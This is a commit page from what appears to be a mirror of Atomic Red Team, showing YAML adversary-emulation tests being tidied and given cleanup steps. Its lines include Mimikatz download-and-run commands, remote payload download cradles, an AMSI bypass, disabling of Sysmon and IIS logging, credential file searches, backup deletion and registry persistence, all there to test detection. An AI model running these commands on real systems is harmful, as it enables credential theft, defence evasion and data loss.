security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Batch of improvements (#716)

Browse Source 
* another batch of improvements

* delete duplicate test, extra cleaining pass
This commit is contained in:
Andrew Beers
2019-12-10 12:19:19 -06:00
committed by Carrie Roberts
parent 890099be35
commit 0c5bcef840
6 changed files with 39 additions and 95 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1081/T1081.yaml
+5 -18
View File
@@ -31,18 +31,6 @@ atomic_tests:
command: |
grep -ri password #{file_path}
- name: Runs Mimikatz & Mimikittenz by name
description: |
Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz ps module.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: |
invoke-mimikittenz
mimikatz.exe
- name: Extracting passwords with findstr
description: |
Extracting Credentials from Files
@@ -54,17 +42,16 @@ atomic_tests:
command: |
findstr /si pass *.xml | *.doc | *.txt | *.xls
ls -R | select-string -Pattern password
- name: Access "unattend.xml"
- name: Access unattend.xml
description: |
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
cmd /c type C:\Windows\Panther\unattend.xml > nul 2>&1
cmd /c type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
type C:\Windows\Panther\unattend.xml > nul 2>&1
type C:\Windows\Panther\Unattend\unattend.xml > nul 2>&1
atomics/T1086/T1086.yaml
+2 -39
View File
@@ -6,16 +6,13 @@ atomic_tests:
- name: Mimikatz
description: |
Download Mimikatz and dump credentials
supported_platforms:
- windows
input_arguments:
mimurl:
description: Mimikatz url
type: url
default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
executor:
name: command_prompt
elevation_required: true
@@ -25,16 +22,13 @@ atomic_tests:
- name: BloodHound
description: |
Download Bloodhound and run it
supported_platforms:
- windows
input_arguments:
bloodurl:
description: BloodHound URL
type: url
default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1
executor:
name: command_prompt
elevation_required: false
@@ -45,10 +39,8 @@ atomic_tests:
description: |
Different obfuscated methods to test
Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
@@ -60,10 +52,8 @@ atomic_tests:
- name: Mimikatz - Cradlecraft PsSendKeys
description: |
Run mimikatz via PsSendKeys
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
@@ -73,12 +63,9 @@ atomic_tests:
- name: Invoke-AppPathBypass
description: |
Note: Windows 10 only
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
@@ -88,10 +75,8 @@ atomic_tests:
- name: PowerShell Add User
description: |
Using PS 5.1, add a user via CLI
supported_platforms:
- windows
input_arguments:
user_name:
description: username to add
@@ -120,16 +105,13 @@ atomic_tests:
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
executor:
name: command_prompt
elevation_required: false
@@ -141,16 +123,13 @@ atomic_tests:
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
executor:
name: command_prompt
elevation_required: false
@@ -161,16 +140,13 @@ atomic_tests:
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell xml download request
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml
executor:
name: command_prompt
elevation_required: false
@@ -181,16 +157,13 @@ atomic_tests:
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell invoke mshta to download payload
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct
executor:
name: powershell
elevation_required: false
@@ -201,10 +174,8 @@ atomic_tests:
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
supported_platforms:
- windows
executor:
name: manual
steps: |
@@ -214,10 +185,8 @@ atomic_tests:
- name: PowerShell Fileless Script Execution
description: |
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
@@ -228,14 +197,12 @@ atomic_tests:
cleanup_command: |
cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt
cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
- name: PowerShell Downgrade Attack
description: |
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
supported_platforms:
- windows
- windows
executor:
name: powershell
elevation_required: false
@@ -247,16 +214,13 @@ atomic_tests:
- name: NTFS Alternate Data Stream Access
description: |
Creates a file with an alternate data stream and simulates executing that hidden code/file
supported_platforms:
- windows
input_arguments:
ads_file:
description: File created to store Alternate Stream Data
type: String
default: $env:TEMP\NTFS_ADS.txt
executor:
name: powershell
elevation_required: false
@@ -268,4 +232,3 @@ atomic_tests:
Invoke-Expression $streamcommand
cleanup_command: |
Remove:Item #{ads_file}
atomics/T1089/T1089.yaml
+13 -14
View File
@@ -98,7 +98,7 @@ atomic_tests:
- name: Unload Sysmon Filter Driver
description: |
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
supported_platforms:
- windows
input_arguments:
@@ -120,7 +120,7 @@ atomic_tests:
- name: Disable Windows IIS HTTP Logging
description: |
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
supported_platforms:
- windows
@@ -130,17 +130,19 @@ atomic_tests:
type: string
default: Default Web Site
executor:
name: command_prompt
name: powershell
prereq_command: |
if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1}
command: |
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
cleanup_command: |
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
- name: Uninstall Sysmon
description: |
Uninstall Sysinternals Sysmon for Defense Evasion
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
@@ -153,11 +155,10 @@ atomic_tests:
- name: AMSI Bypass - AMSI InitFailed
description: |
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
@@ -169,11 +170,9 @@ atomic_tests:
- name: AMSI Bypass - Remove AMSI Provider Reg Key
description: |
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key.
This test removes the Windows Defender provider registry key.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
@@ -184,7 +183,7 @@ atomic_tests:
- name: Disable Arbitrary Security Windows Service
description: |
With administrative rights, an adversary can disable Windows Services related to security products.
With administrative rights, an adversary can disable Windows Services related to security products.
supported_platforms:
- windows
input_arguments:
@@ -204,7 +203,7 @@ atomic_tests:
- name: Disable PowerShell Script Block Logging
description: |
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
An adversary may disable PowerShell Script Block Logging to avoid leaving evidence.
Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
@@ -225,7 +224,7 @@ atomic_tests:
- name: PowerShell Bypass of AntiMalware Scripting Interface
description: |
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
An adversary may bypass Windows Defender AMSI to execute malicious PowerShell code.
Credit to Matt Graeber (@mattifestation) for the research.
supported_platforms:
@@ -234,4 +233,4 @@ atomic_tests:
name: powershell
elevation_required: false
command: |
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
atomics/T1100/T1100.yaml
+2 -1
View File
@@ -8,7 +8,6 @@ atomic_tests:
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
Idea from APTSimulator.
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
supported_platforms:
- windows
input_arguments:
@@ -24,3 +23,5 @@ atomic_tests:
name: command_prompt
command: |
xcopy #{web_shells} #{web_shell_path}
cleanup_command: |
del #{web_shell_path}
atomics/T1107/T1107.yaml
+10 -20
View File
@@ -55,48 +55,36 @@ atomic_tests:
Delete a single file from the temporary directory using cmd.exe
supported_platforms:
- windows
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
default: C:\Windows\Temp\victim-files-cmd\a
executor:
name: command_prompt
elevation_required: false
command: |
del /f #{file_to_delete}
echo "T1107" > %temp%\T1107.txt
del /f %temp%\T1107.txt
- name: Delete an entire folder - Windows cmd
description: |
Recursively delete the temporary directory and all files contained within it using cmd.exe
supported_platforms:
- windows
input_arguments:
folder_to_delete:
description: Path of folder to delete
type: Path
default: C:\Windows\Temp\victim-files-cmd
executor:
name: command_prompt
elevation_required: false
command: |
del /f /S #{folder_to_delete}
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
- name: Delete a single file - Windows PowerShell
description: |
Delete a single file from the temporary directory using Powershell
supported_platforms:
- windows
input_arguments:
file_to_delete:
description: Path of file to delete
type: Path
default: C:\Windows\Temp\victim-files-ps\a
executor:
name: powershell
elevation_required: false
command: |
Remove-Item -path "#{file_to_delete}"
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
- name: Delete an entire folder - Windows PowerShell
description: |
@@ -112,7 +100,8 @@ atomic_tests:
name: powershell
elevation_required: false
command: |
Remove-Item -path "#{folder_to_delete}" -recurse
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
- name: Delete VSS - vssadmin
description: |
@@ -143,13 +132,14 @@ atomic_tests:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
- name: wbadmin
description: |
This test deletes Windows Backup catalogs.
This test deletes Windows Backup catalogs.
supported_platforms:
- windows
executor:
atomics/T1112/T1112.yaml
+7 -3
View File
@@ -10,9 +10,11 @@ atomic_tests:
- windows
executor:
name: command_prompt
elevation_required: false
elevation_required: true
command: |
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
cleanup_command: |
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f
- name: Modify Registry of Local Machine - cmd
description: |
@@ -25,6 +27,8 @@ atomic_tests:
elevation_required: true
command: |
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
cleanup_command: |
reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
- name: Modify Registry of Another User Profile
description: |
@@ -90,7 +94,7 @@ atomic_tests:
- name: Modify registry to store logon credentials
description: |
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
supported_platforms:
- windows
executor:
@@ -129,4 +133,4 @@ atomic_tests:
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
cleanup_command: |
Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}
Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}